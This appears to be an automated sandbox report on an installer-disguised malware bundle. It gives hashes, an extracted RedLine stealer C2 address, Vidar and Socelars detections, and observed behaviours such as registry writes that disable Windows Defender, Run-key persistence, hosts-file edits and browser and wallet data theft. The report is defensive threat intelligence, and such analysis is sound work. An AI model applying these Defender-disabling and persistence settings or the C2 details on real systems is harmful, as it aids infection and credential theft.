Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
8setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
05-10-2021 16:27
211005-tx24csaah9 1004-10-2021 16:37
211004-t43cpsgfe7 1004-10-2021 07:39
211004-jhgtrsfhf8 1003-10-2021 18:09
211003-wryvvsffgk 1002-10-2021 23:31
211002-3hwsgaehhl 1002-10-2021 06:10
211002-gxfh5sdgg7 1001-10-2021 13:44
211001-q16deabhek 10Analysis
-
max time kernel
1807s -
max time network
1810s -
platform
windows11_x64 -
resource
win11 -
submitted
02-10-2021 06:10
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20210920
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
6.4MB
-
MD5
c6e46aa3d6424b03e0a4ccb193d3eade
-
SHA1
c8b49055743fa7b4d6a982aea26efb627bb1f2e1
-
SHA256
5e2bf564a4f985a7482d505def1ec79c92566bf7eda4724811ee29b9c4a66156
-
SHA512
06e0c7d8012d4dbf1e6ccb7049c16d3041eb792261cc9910115c8663a45272c90cbce0ccd51875b8cd465b8f5a5c9f69164cc665b60787884ac42aec3aa7d32e
Malware Config
Extracted
redline
ANI
45.142.215.47:27643
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5540 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5476 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7528 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4788 4792 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/5616-286-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5616-287-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10720d229511df563.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10720d229511df563.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 41 IoCs
Processes:
WerFault.exeConhost.exeforfiles.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execontrol.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exerundll32.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeforfiles.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 4520 created 5648 4520 WerFault.exe rundll32.exe PID 5944 created 1004 5944 Conhost.exe ShadowVPNInstaller_t3.exe PID 4868 created 4668 4868 forfiles.exe Fri105268dda3.exe PID 4028 created 5064 4028 WerFault.exe 4918688.scr PID 5764 created 4536 5764 WerFault.exe 7926442.scr PID 3936 created 4448 3936 WerFault.exe Fri10acd1e0a9e6.exe PID 4248 created 1004 4248 WerFault.exe ShadowVPNInstaller_t3.exe PID 5612 created 4036 5612 control.exe rundll32.exe PID 2540 created 1004 2540 WerFault.exe ShadowVPNInstaller_t3.exe PID 3964 created 3552 3964 WerFault.exe Firstoffer.exe PID 5972 created 5900 5972 WerFault.exe schtasks.exe PID 5944 created 1004 5944 Conhost.exe ShadowVPNInstaller_t3.exe PID 3780 created 1004 3780 WerFault.exe ShadowVPNInstaller_t3.exe PID 5416 created 1004 5416 WerFault.exe ShadowVPNInstaller_t3.exe PID 1304 created 5800 1304 WerFault.exe GcleanerEU.exe PID 3160 created 5576 3160 WerFault.exe BvPolz1JLrEUFfkyuKjjUWkz.exe PID 1876 created 4220 1876 WerFault.exe taskkill.exe PID 4552 created 3768 4552 WerFault.exe vc.exe PID 4460 created 1196 4460 U5LisTvMX5gU8okdeY7zz5Yy.exe PID 5764 created 5140 5764 WerFault.exe GsPD1a5eAJ9Jw9nfgKLNz8PO.exe PID 8144 created 5092 8144 WerFault.exe 9GvwD_b5Wbw2W6pqbc6bz_pf.exe PID 7416 created 5668 7416 cmd.exe DCOPiLwlD2B11rHJvQSil2Vm.exe PID 7784 created 1004 7784 WerFault.exe ShadowVPNInstaller_t3.exe PID 5596 created 7424 5596 WerFault.exe rundll32.exe PID 6548 created 7280 6548 rundll32.exe gcleaner.exe PID 2608 created 1004 2608 WerFault.exe ShadowVPNInstaller_t3.exe PID 4000 created 1004 4000 WerFault.exe ShadowVPNInstaller_t3.exe PID 6668 created 7772 6668 WerFault.exe 3A0E.exe PID 5560 created 1004 5560 WerFault.exe ShadowVPNInstaller_t3.exe PID 7692 created 1004 7692 WerFault.exe ShadowVPNInstaller_t3.exe PID 7760 created 2468 7760 WerFault.exe 4105.exe PID 7700 created 1004 7700 WerFault.exe ShadowVPNInstaller_t3.exe PID 8156 created 1556 8156 cmd.exe 36D4KJuQIhW2OmfRkZ4eFWq7.exe PID 4004 created 6496 4004 Sylapiwozhu.exe PID 8132 created 932 8132 forfiles.exe 1TNfF5svoOgPuV3Zb6nGOmzz.exe PID 6688 created 4384 6688 cmd.exe 7C1C.exe PID 6332 created 1004 6332 WerFault.exe ShadowVPNInstaller_t3.exe PID 6732 created 1004 6732 WerFault.exe ShadowVPNInstaller_t3.exe PID 6160 created 7216 6160 WerFault.exe GcleanerEU.exe PID 736 created 4380 736 WerFault.exe gcleaner.exe PID 7164 created 6548 7164 WerFault.exe rundll32.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
svchost.exedescription pid process target process PID 7516 created 6420 7516 svchost.exe AdvancedRun.exe PID 7516 created 6420 7516 svchost.exe AdvancedRun.exe -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral4/memory/3552-519-0x00000000007B0000-0x0000000000884000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\libcurlpp.dll aspack_v212_v242 -
Blocklisted process makes network request 43 IoCs
Processes:
WMIC.exepowershell.exeMsiExec.exeflow pid process 215 6356 WMIC.exe 243 6356 WMIC.exe 301 7012 powershell.exe 354 6456 MsiExec.exe 356 6456 MsiExec.exe 357 6456 MsiExec.exe 359 6456 MsiExec.exe 360 6456 MsiExec.exe 362 6456 MsiExec.exe 363 6456 MsiExec.exe 364 6456 MsiExec.exe 367 6456 MsiExec.exe 374 6456 MsiExec.exe 375 6456 MsiExec.exe 377 6456 MsiExec.exe 381 6456 MsiExec.exe 383 6456 MsiExec.exe 384 6456 MsiExec.exe 385 6456 MsiExec.exe 386 6456 MsiExec.exe 387 6456 MsiExec.exe 389 6456 MsiExec.exe 392 6456 MsiExec.exe 397 6456 MsiExec.exe 401 6456 MsiExec.exe 403 6456 MsiExec.exe 404 6456 MsiExec.exe 405 6456 MsiExec.exe 406 6456 MsiExec.exe 407 6456 MsiExec.exe 409 6456 MsiExec.exe 411 6456 MsiExec.exe 412 6456 MsiExec.exe 413 6456 MsiExec.exe 414 6456 MsiExec.exe 416 6456 MsiExec.exe 419 6456 MsiExec.exe 425 6456 MsiExec.exe 429 6456 MsiExec.exe 430 6456 MsiExec.exe 431 6456 MsiExec.exe 432 6456 MsiExec.exe 433 6456 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
Sharefolder.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts File opened for modification C:\Windows\system32\drivers\etc\hosts Sharefolder.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeFri10b0a06a73706.exeFri1034cd265b5e0adcd.exeFri1015b9a4e0b.exeFri10584c049c7f.exeFri1008c7d6874.exeFri1018ef4aa251c026c.exeFri106e757f6d75.exeFri10d184202996a0d7f.exeFri103a7805577.exeFri105268dda3.exeFri10720d229511df563.exeFri10fcc13ae0125c8.exeFri10acd1e0a9e6.exeFri10fcc13ae0125c8.tmpSkVPVS3t6Y8W.EXeSayma.exeLzmwAqmV.exe7138906.scrFri106e757f6d75.exe3963745.scrChrome 5.exe6450217.scrDownFlSetup110.exeinst001.exeFirstoffer.exe7375211.scrShadowVPNInstaller_t3.exe6066875.scrschtasks.exe6.exesfx_123_206.exeWinHoster.exesetup_2.exe5570170.scrsetup_2.tmpjhuuee.exe8754910.scrxiuyingzhang-game.exesvchost.exesetup_2.tmp4MCYlgNAW.eXE7926442.scr2412914.scr1750641.scrpostback.exeLzmwAqmV.exeservices64.exeinstaller.exeinstaller.tmpWerFault.exevc.exeVC_redist.x86.exeultramediaburner.exeultramediaburner.tmpKyfidyzheni.exeXewuxitumo.exeUltraMediaBurner.exeGcleanerEU.exeinstaller.exetaskkill.exeU5LisTvMX5gU8okdeY7zz5Yy.exeE7nn_1406j8v_DAvaZ603zjG.exepid process 3592 setup_installer.exe 4712 setup_install.exe 1192 Fri10b0a06a73706.exe 5060 Fri1034cd265b5e0adcd.exe 5064 Fri1015b9a4e0b.exe 4460 Fri10584c049c7f.exe 4248 Fri1008c7d6874.exe 5004 Fri1018ef4aa251c026c.exe 3552 Fri106e757f6d75.exe 4768 Fri10d184202996a0d7f.exe 4880 Fri103a7805577.exe 4668 Fri105268dda3.exe 4536 Fri10720d229511df563.exe 4924 Fri10fcc13ae0125c8.exe 4448 Fri10acd1e0a9e6.exe 5264 Fri10fcc13ae0125c8.tmp 5688 SkVPVS3t6Y8W.EXe 5708 Sayma.exe 5836 LzmwAqmV.exe 5856 7138906.scr 5616 Fri106e757f6d75.exe 6008 3963745.scr 4660 Chrome 5.exe 5420 6450217.scr 5440 DownFlSetup110.exe 5756 inst001.exe 3552 Firstoffer.exe 5200 7375211.scr 1004 ShadowVPNInstaller_t3.exe 5296 6066875.scr 5900 schtasks.exe 5936 6.exe 5724 sfx_123_206.exe 6136 WinHoster.exe 4544 setup_2.exe 4600 5570170.scr 6016 setup_2.tmp 852 jhuuee.exe 420 8754910.scr 1408 xiuyingzhang-game.exe 4784 svchost.exe 556 setup_2.tmp 4652 4MCYlgNAW.eXE 4536 7926442.scr 5904 2412914.scr 3784 1750641.scr 5552 postback.exe 1160 LzmwAqmV.exe 4968 services64.exe 5308 installer.exe 6044 installer.tmp 1496 WerFault.exe 3768 vc.exe 5428 VC_redist.x86.exe 4768 ultramediaburner.exe 5532 ultramediaburner.tmp 1340 Kyfidyzheni.exe 3208 Xewuxitumo.exe 664 UltraMediaBurner.exe 5800 GcleanerEU.exe 5832 installer.exe 4220 taskkill.exe 1196 U5LisTvMX5gU8okdeY7zz5Yy.exe 5368 E7nn_1406j8v_DAvaZ603zjG.exe -
Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
FagG1SGQfnP6IjkfVBdFalhu.exeE7nn_1406j8v_DAvaZ603zjG.exe7375211.scrPlj_3DiKRZBFwjHkdIqlcQSo.exe3cz5pAmGIdhR8wlRxJOvpwBP.exen1SlVGQ44lcYrFuYBI4Z3Kwx.exeInstall.exe8591180.scr691F.exe77eW5iVFnAmHMmCyd37f2UET.exe4918688.scrInstall.exeFri10d184202996a0d7f.exeWMIC.exe6165866.scr1603748.scr6450217.scr2412914.scr7926442.scrdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FagG1SGQfnP6IjkfVBdFalhu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion E7nn_1406j8v_DAvaZ603zjG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7375211.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Plj_3DiKRZBFwjHkdIqlcQSo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3cz5pAmGIdhR8wlRxJOvpwBP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion n1SlVGQ44lcYrFuYBI4Z3Kwx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8591180.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 691F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Plj_3DiKRZBFwjHkdIqlcQSo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 77eW5iVFnAmHMmCyd37f2UET.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 77eW5iVFnAmHMmCyd37f2UET.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4918688.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fri10d184202996a0d7f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fri10d184202996a0d7f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WMIC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion n1SlVGQ44lcYrFuYBI4Z3Kwx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6165866.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1603748.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8591180.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6450217.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2412914.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4918688.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1603748.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3cz5pAmGIdhR8wlRxJOvpwBP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6165866.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6450217.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 691F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion E7nn_1406j8v_DAvaZ603zjG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7375211.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FagG1SGQfnP6IjkfVBdFalhu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7926442.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WMIC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2412914.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7926442.scr -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeFri10fcc13ae0125c8.tmprundll32.exesetup_2.tmpsetup_2.tmprundll32.exerundll32.exeLzmwAqmV.exerundll32.exerundll32.exeinstaller.tmprundll32.exevc.exeinstaller.exeMsiExec.exeShadowVPNInstaller_t3.exerundll32.exeMsiExec.exebamF0gLctfDEX7DW5KJWOxvR.tmppid process 4712 setup_install.exe 4712 setup_install.exe 4712 setup_install.exe 4712 setup_install.exe 4712 setup_install.exe 4712 setup_install.exe 5264 Fri10fcc13ae0125c8.tmp 5648 rundll32.exe 6016 setup_2.tmp 556 setup_2.tmp 5128 rundll32.exe 4036 rundll32.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 5852 rundll32.exe 5852 rundll32.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 1160 LzmwAqmV.exe 4436 rundll32.exe 6044 installer.tmp 5988 rundll32.exe 3768 vc.exe 5832 installer.exe 5832 installer.exe 5832 installer.exe 4276 MsiExec.exe 4276 MsiExec.exe 1004 ShadowVPNInstaller_t3.exe 1004 ShadowVPNInstaller_t3.exe 1004 ShadowVPNInstaller_t3.exe 7424 rundll32.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 5832 installer.exe 6456 MsiExec.exe 3976 bamF0gLctfDEX7DW5KJWOxvR.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10d184202996a0d7f.exe themida C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10d184202996a0d7f.exe themida behavioral4/memory/4768-250-0x0000000000350000-0x0000000000351000-memory.dmp themida C:\Users\Admin\AppData\Roaming\6450217.scr themida -
Processes:
4105.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4105.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection 4105.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 4105.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet 4105.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" 4105.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 4105.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 4105.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 4105.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\4105.exe = "0" 4105.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" 4105.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
msedge.exeVC_redist.x86.exeSharefolder.exe3963745.scrdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\UltraMediaBurner\\Nuvicesuty.exe\"" Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{a8968509-65be-4c09-a460-fd1584b1cdbf} = "\"C:\\ProgramData\\Package Cache\\{a8968509-65be-4c09-a460-fd1584b1cdbf}\\VC_redist.x86.exe\" /burn.runonce" VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\PowerControl\\Mashelobyxo.exe\"" Sharefolder.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 3963745.scr -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
7375211.scrPlj_3DiKRZBFwjHkdIqlcQSo.exe3cz5pAmGIdhR8wlRxJOvpwBP.exe6165866.scr1603748.scrPZptpEMnIjoWnUNWlzwk2Xr6.exe2412914.scrE7nn_1406j8v_DAvaZ603zjG.exe691F.exe7926442.scrn1SlVGQ44lcYrFuYBI4Z3Kwx.exeWMIC.exe77eW5iVFnAmHMmCyd37f2UET.exe4918688.scrFri10d184202996a0d7f.exe6450217.scrFagG1SGQfnP6IjkfVBdFalhu.exe8591180.scrdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7375211.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Plj_3DiKRZBFwjHkdIqlcQSo.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3cz5pAmGIdhR8wlRxJOvpwBP.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6165866.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1603748.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PZptpEMnIjoWnUNWlzwk2Xr6.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2412914.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA E7nn_1406j8v_DAvaZ603zjG.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 691F.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7926442.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA n1SlVGQ44lcYrFuYBI4Z3Kwx.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WMIC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 77eW5iVFnAmHMmCyd37f2UET.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4918688.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Fri10d184202996a0d7f.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6450217.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FagG1SGQfnP6IjkfVBdFalhu.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8591180.scr -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeinstaller.exemsiexec.exeInstall.exedescription ioc process File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: Install.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 ipinfo.io 41 ipinfo.io 117 ip-api.com 118 ipinfo.io 193 ipinfo.io 231 ipinfo.io 2 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
Install.exeInstall.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 31 IoCs
Processes:
